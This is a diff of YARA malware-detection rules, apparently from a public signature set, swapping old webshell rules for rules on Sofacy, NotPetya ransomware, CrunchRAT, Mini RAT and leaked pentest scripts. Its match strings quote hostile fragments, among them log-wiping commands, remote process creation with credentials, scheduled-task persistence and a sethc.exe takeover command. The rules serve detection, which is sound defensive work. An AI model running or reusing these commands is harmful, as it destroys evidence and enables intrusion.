+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "W3D Shell"
-		$s1 = "By: Warpboy"
-		$s2 = "No Query Executed"
+		$typelibguid0 = "e54195f0-060c-4b24-98f2-ad9fb5351045" ascii nocase wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Cgi
+rule SIGNATURE_BASE_MAL_Etoroloro_Malicious_Nodepackage_Dec25 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file WebShell.cgi.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "b768bb72-64e8-545a-9123-3d5889b58a82"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3976-L3987"
+		description = "Detects malicious component of node package named Etoroloro"
+		author = "Pezier Pierre-Henri"
+		id = "e4d05de8-2452-5c92-826e-0a2131d98ce6"
+		date = "2025-12-12"
+		modified = "2025-12-15"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_etoroloro_nodepackage_dec25.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bc486c2e00b5fc3e4e783557a2441e6f"
-		logic_hash = "8908ced96284de6b6d5ae693ba54c49a6333bbe5780d951cbacc91b4dde027df"
-		score = 75
+		hash = "f08c5b748c91dd45fd73c5e85920f656e361d94b869e2147410b2b528c6ae78f"
+		logic_hash = "bd890359c38fb7f2af31390666691af70a202dcf352ef44e95493dc340c07e94"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s0 = "WebShell.cgi"
-		$s2 = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else"
+		$s1 = "DLLSideload."
+		$s2 = "Failed to expand path:" wide
+		$op1 = {
+         41 0f af c0           // imul    eax, r8d
+         48 8d 52 01           // lea     rdx, [rdx+1]
+         0f b6 c9              // movzx   ecx, cl
+         45 69 c0 35 d4 04 00  // imul    r8d, 4D435h
+         03 c1                 // add     eax, ecx
+         0f b6 0a              // movzx   ecx, byte ptr [rdx]
+         84 c9                 // test    cl, cl
+         75 e5                 // jnz     short loc_1800022C0
+      }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or $op1 )
 }
-rule SIGNATURE_BASE_Winx_Shell_Html
+rule SIGNATURE_BASE_Sofacy_Jun16_Sample1 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file WinX Shell.html.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "fe02d995-4375-5ce9-aabe-fae5d29278d3"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3988-L4000"
+		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "62b577e3-7ccb-59df-a944-96ffe9b16d3d"
+		date = "2016-06-14"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/mzAa97"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_jun16.yar#L10-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "17ab5086aef89d4951fe9b7c7a561dda"
-		logic_hash = "4248f807d66990946523ba7b92d795c2c40429182389d9bf3f4a972e246b50c6"
-		score = 75
+		logic_hash = "761cec3d04e6b5273cfb450000023ed10ea73d17648c0af7660f4ef2b37fc31c"
+		score = 85
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "be1cfa10fcf2668ae01b98579b345ebe87dab77b6b1581c368d1aba9fd2f10a0"
 
 	strings:
-		$s0 = "WinX Shell"
-		$s1 = "Created by greenwood from n57"
-		$s2 = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>"
+		$s1 = "clconfg.dll" fullword ascii
+		$s2 = "ASijnoKGszdpodPPiaoaghj8127391" fullword wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Dx_Php_Php
+rule SIGNATURE_BASE_Sofacy_Jun16_Sample2 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Dx.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "67d0bccb-d39a-5e30-bdc0-801525ebddd7"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4001-L4013"
+		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "21561e13-a190-565e-a08b-e6a07c84c3db"
+		date = "2016-06-14"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/mzAa97"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_jun16.yar#L27-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
-		logic_hash = "ab43ddcf317eb4db890ca9750dc6bbc19b06b806339a67c82216df02bc2e8446"
-		score = 75
+		logic_hash = "a1f334996527556334c34d0308da6165e9d2a3d7eb8b2ecc322b574dea4d4844"
+		score = 85
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "57d230ddaf92e2d0504e5bb12abf52062114fb8980c5ecc413116b1d6ffedf1b"
+		hash2 = "69940a20ab9abb31a03fcefe6de92a16ed474bbdff3288498851afc12a834261"
+		hash3 = "aeeab3272a2ed2157ebf67f74c00fafc787a2b9bbaa17a03be1e23d4cb273632"
 
 	strings:
-		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
-		$s2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util"
-		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP"
+		$x1 = "DGMNOEP" fullword ascii
+		$x2 = "/%s%s%s/?%s=" fullword ascii
+		$s1 = "Control Panel\\Dehttps=https://%snetwork.proxy.ht2" fullword ascii
+		$s2 = "http=http://%s:%Control Panel\\Denetwork.proxy.ht&ol1mS9" fullword ascii
+		$s3 = "svchost.dll" fullword wide
+		$s4 = "clconfig.dll" fullword wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( all of ( $x* ) ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Csh_Php_Php
+rule SIGNATURE_BASE_Sofacy_Jun16_Sample3 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file csh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "da691516-d6c9-5c4b-85c3-f1cd7fc96ae7"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4014-L4027"
+		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f97bc840-0d9a-5a9e-9e13-7b7f8acc53a5"
+		date = "2016-06-14"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/mzAa97"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_jun16.yar#L51-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "194a9d3f3eac8bc56d9a7c55c016af96"
-		logic_hash = "2a74e06a9fd59d7a577041b49403738904239fb011f9bfe2fb665165991b9c98"
-		score = 75
+		logic_hash = "bdc6fcc30ebd7a966391747e4156a6d94dc9187e8b8898de4c441540ec4e637e"
+		score = 85
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c2551c4e6521ac72982cb952503a2e6f016356e02ee31dea36c713141d4f3785"
 
 	strings:
-		$s0 = ".::[c0derz]::. web-shell"
-		$s1 = "http://c0derz.org.ua"
-		$s2 = "vint21h@c0derz.org.ua"
-		$s3 = "$name='63a9f0ea7bb98050796b649e85481845';//root"
+		$s1 = "ASLIiasiuqpssuqkl713h" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and $s1
 }
-rule SIGNATURE_BASE_Phpinj_Php_Php
+rule SIGNATURE_BASE_Notpetya_Ransomware_Jun17 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file pHpINJ.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "7bf54ef4-a3d8-51c6-8db7-bf8947e992ed"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4028-L4040"
+		description = "Detects new NotPetya Ransomware variant from June 2017"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8805f971-0680-534d-9955-65dc4ecc934a"
+		date = "2017-06-27"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/h6iaGj"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nopetya_jun17.yar#L12-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d7a4b0df45d34888d5a09f745e85733f"
-		logic_hash = "5d39fd31cdaae7765267ce8a35a2fdcf86e7f0de40d4f303fb0f219c0fc04e40"
+		logic_hash = "e49fd918e9cc09a60434e62767794cd908f195cb71fd7a752a2b4802973bc92e"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745"
+		hash2 = "45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0"
+		hash3 = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1"
 
 	strings:
-		$s1 = "News Remote PHP Shell Injection"
-		$s3 = "Php Shell <br />" fullword
-		$s4 = "<input type = \"text\" name = \"url\" value = \""
+		$x1 = "Ooops, your important files are encrypted." fullword wide ascii
+		$x2 = "process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1 " fullword wide
+		$x3 = "-d C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\%s\",#1 " fullword wide
+		$x4 = "Send your Bitcoin wallet ID and personal installation key to e-mail " fullword wide
+		$x5 = "fsutil usn deletejournal /D %c:" fullword wide
+		$x6 = "wevtutil cl Setup & wevtutil cl System" ascii
+		$x7 = { 2C 00 23 00 31 00 20 00 00 00 00 00 00 00 00 00 72 00 75 00 6E
+         00 64 00 6C 00 6C 00 33 00 32 00 2E 00 65 00 78 00 65 00 }
+		$s1 = "%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\" " fullword wide
+		$s4 = "\\\\.\\pipe\\%ws" fullword wide
+		$s5 = "schtasks %ws/Create /SC once /TN \"\" /TR \"%ws\" /ST %02d:%02d" fullword wide
+		$s6 = "u%s \\\\%s -accepteula -s " fullword wide
+		$s7 = "dllhost.dat" fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Sig_2008_Php_Php
+rule SIGNATURE_BASE_Crunchrat : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file 2008.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "bfa3caa9-70a5-536b-a887-58427eee43df"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4041-L4054"
+		description = "Detects CrunchRAT - file CrunchRAT.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "da7d9b5c-6ccc-5960-9daa-4df612545751"
+		date = "2017-11-03"
+		modified = "2023-12-05"
+		reference = "https://github.com/t3ntman/CrunchRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_crunchrat.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3e4ba470d4c38765e4b16ed930facf2c"
-		logic_hash = "a437dc3dc836e93c7a691f7a000c4a4ae574ba95b3a216394ba42538beb9c0f7"
+		logic_hash = "e29cfe6dd2ca69b1a8cd0cb36f7513dd9befd392906225196991dc62fcc80870"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "58a07e96497745b6fd5075d569f17b0254c3e50b0234744e0487f7c5dddf7161"
 
 	strings:
-		$s0 = "Codz by angel(4ngel)"
-		$s1 = "Web: http://www.4ngel.net"
-		$s2 = "$admin['cookielife'] = 86400;"
-		$s3 = "$errmsg = 'The file you want Downloadable was nonexistent';"
+		$x1 = "----CrunchRAT" fullword wide
+		$x2 = "\\Debug\\CrunchRAT" ascii
+		$x3 = "\\Release\\CrunchRAT" ascii
+		$s1 = "runCommand" fullword ascii
+		$s2 = "<action>download<action>" fullword wide
+		$s3 = "Content-Disposition: form-data; name=action" fullword wide
+		$s4 = "<action>upload<action>" fullword wide
+		$s5 = "/update.php" fullword wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) and 3 of them )
 }
-rule SIGNATURE_BASE_Ak74Shell_Php_Php
+rule SIGNATURE_BASE_Minirat_Gen_1 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file ak74shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "eaf243cb-fa26-5f34-a724-60a08acff636"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4055-L4067"
+		description = "Detects Mini RAT malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "65d89762-2fd0-5c6a-b706-92d77a03089a"
+		date = "2018-01-22"
+		modified = "2023-12-05"
+		reference = "https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_darkcaracal.yar#L12-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7f83adcb4c1111653d30c6427a94f66f"
-		logic_hash = "64eb7e72679fc9ee81af6f46d0ab604357710716b93b1ddfaebc5596c968fce8"
+		logic_hash = "53c4ba16ae2c3eb3a6c7371e7fc8b962cfbee5b70abd8267294834eac3e55769"
 		score = 75
-		quality = 60
-		tags = ""
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b"
+		hash2 = "b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d"
+		hash3 = "ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2"
+		hash4 = "ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790"
+		hash5 = "675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd"
 
 	strings:
-		$s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION["
-		$s2 = "AK-74 Security Team Web Site: www.ak74-team.net"
-		$s3 = "$xshell"
+		$x1 = "\\Mini rat\\" ascii
+		$x2 = "\\Projects\\ali\\Clever Components v7\\" ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 7000KB and 1 of them
 }
-rule SIGNATURE_BASE_Rem_View_Php_Php
+rule SIGNATURE_BASE_CN_Honker_Mafix_Root : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Rem View.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "6137434c-89e9-537b-9b26-b56178022b76"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4068-L4080"
+		description = "Script from disclosed CN Honker Pentest Toolset - file root"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ae08b2e9-4d81-5f15-88d2-e2ace20626bf"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L8-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "29420106d9a81553ef0d1ca72b9934d9"
-		logic_hash = "bcd5c86e793748ffe0ce4415ee68101e8183e1f97477b49843938d254f08695a"
-		score = 75
+		hash = "826778ef9c22177d41698b467586604e001fed19"
+		logic_hash = "db54561ba4b9c1bd4d9b183658b98f6fd3165b05c8d6d7f006ae3b5fc96ba549"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\""
-		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
-		$s4 = "Welcome to phpRemoteView (RemView)"
+		$s0 = "echo \"# vbox (voice box) getty\" >> /tmp/.init1" fullword ascii
+		$s1 = "cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog" fullword ascii
+		$s2 = "if [ -f /sbin/xlogin ]; then" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 96KB and all of them
 }
-rule SIGNATURE_BASE_Java_Shell_Js
+rule SIGNATURE_BASE_CN_Honker_Passwd_Dict_3389 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Java Shell.js.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "eff52c3a-fc3a-5e80-8da9-786168159ebc"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4081-L4093"
+		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9418f0e5-7bf0-5df3-8857-dea90fae5a54"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L26-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
-		logic_hash = "f312298ac30ab57b21222a529b1566b9a66909806e4bc88120ac3992cfd3c6fb"
-		score = 75
+		hash = "2897e909e48a9f56ce762244c3a3e9319e12362f"
+		logic_hash = "2be79fc7388ca12f06577e689944bcfa72ed1e1b6da5a7fa15c8da69a4555a9a"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "PySystemState.initialize(System.getProperties(), null, argv);" fullword
-		$s3 = "public class JythonShell extends JPanel implements Runnable {" fullword
-		$s4 = "public static int DEFAULT_SCROLLBACK = 100"
+		$s0 = "654321" fullword ascii
+		$s1 = "admin123" fullword ascii
+		$s2 = "admin123456" fullword ascii
+		$s3 = "administrator" fullword ascii
+		$s4 = "passwd" fullword ascii
+		$s5 = "password" fullword ascii
+		$s7 = "12345678" fullword ascii
 
 	condition:
-		2 of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_STNC_Php_Php
+rule SIGNATURE_BASE_CN_Honker_Perl_Serv_U : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file STNC.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "8a7167f6-fa62-574f-a37c-3ceadc7f92ec"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4094-L4107"
+		description = "Script from disclosed CN Honker Pentest Toolset - file Perl-serv-U.pl"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d793227d-dd4d-5c92-bfdc-9662c3ed8933"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L48-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2e56cfd5b5014cbbf1c1e3f082531815"
-		logic_hash = "b4118dc45ac109bde1cafda24cc103370db57c1993690f450cff828c1633af3c"
-		score = 75
+		hash = "f333c597ff746ebd5a641fbc248497d61e3ec17b"
+		logic_hash = "deb4ee54f9127bc093f96f7dbf3633fbfc3f66358c76fb15928dabbbffdd4963"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "drmist.ru" fullword
-		$s1 = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80"
-		$s2 = "STNC WebShell"
-		$s3 = "http://www.security-teams.net/index.php?showtopic="
+		$s1 = "$dir = 'C:\\\\WINNT\\\\System32\\\\';" fullword ascii
+		$s2 = "$sock = IO::Socket::INET->new(\"127.0.0.1:$adminport\") || die \"fail\";" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 8KB and all of them
 }
-rule SIGNATURE_BASE_Azrailphp_V1_0_Php
+rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_F4Ck : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file aZRaiLPhp v1.0.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "60152b96-e8d3-5b06-a855-fb64a490742b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4108-L4120"
+		description = "Script from disclosed CN Honker Pentest Toolset - file f4ck.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "abf2f277-79b4-5ca2-b12e-93a662e5d607"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L65-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "26b2d3943395682e36da06ed493a3715"
-		logic_hash = "4385f294e59b644fe86d8380db4f7926924eb744ad80735b78ef778d2f7e8ae0"
-		score = 75
+		hash = "e216f4ba3a07de5cdbb12acc038cd8156618759e"
+		logic_hash = "be4817bcaae952eb13c35dd89606ec733c682b2e197054bb348c3934012bd105"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "azrailphp"
-		$s1 = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>"
-		$s3 = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>"
+		$s0 = "PassWord:F4ckTeam!@#" fullword ascii
+		$s1 = "UserName:F4ck" fullword ascii
+		$s2 = "F4ck Team" fullword ascii
 
 	condition:
-		2 of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Moroccan_Spamers_Ma_Edition_By_Ghost_Php
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_3389 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "721d6e9f-a237-5462-a8d3-f838d7fda420"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4121-L4133"
+		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.vbs"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6d385820-befe-5e2b-8c48-ad90564d5f42"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L83-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d1b7b311a7ffffebf51437d7cd97dc65"
-		logic_hash = "e755e4ea467861e5217d532b161bf4c582ff71aa1e4720dfa4b75d6e8d7629d8"
-		score = 75
+		hash = "f92b74f41a2138cc05c6b6993bcc86c706017e49"
+		logic_hash = "32603edd3f188a9f4919795df04112883d7b88da46b13fcd0b0e0065fd4c016b"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = ";$sd98=\"john.barker446@gmail.com\""
-		$s1 = "print \"Sending mail to $to....... \";"
-		$s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei"
+		$s1 = "success = obj.run(\"cmd /c takeown /f %SystemRoot%\\system32\\sethc.exe&echo y| " ascii
 
 	condition:
-		1 of them
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_Zacosmall_Php
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_3389_2 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file zacosmall.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "25946aa7-7c56-5670-ae2f-c55e65a3b911"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4134-L4146"
+		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.bat"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f449f632-3102-5e62-b790-5546698dd663"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L99-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
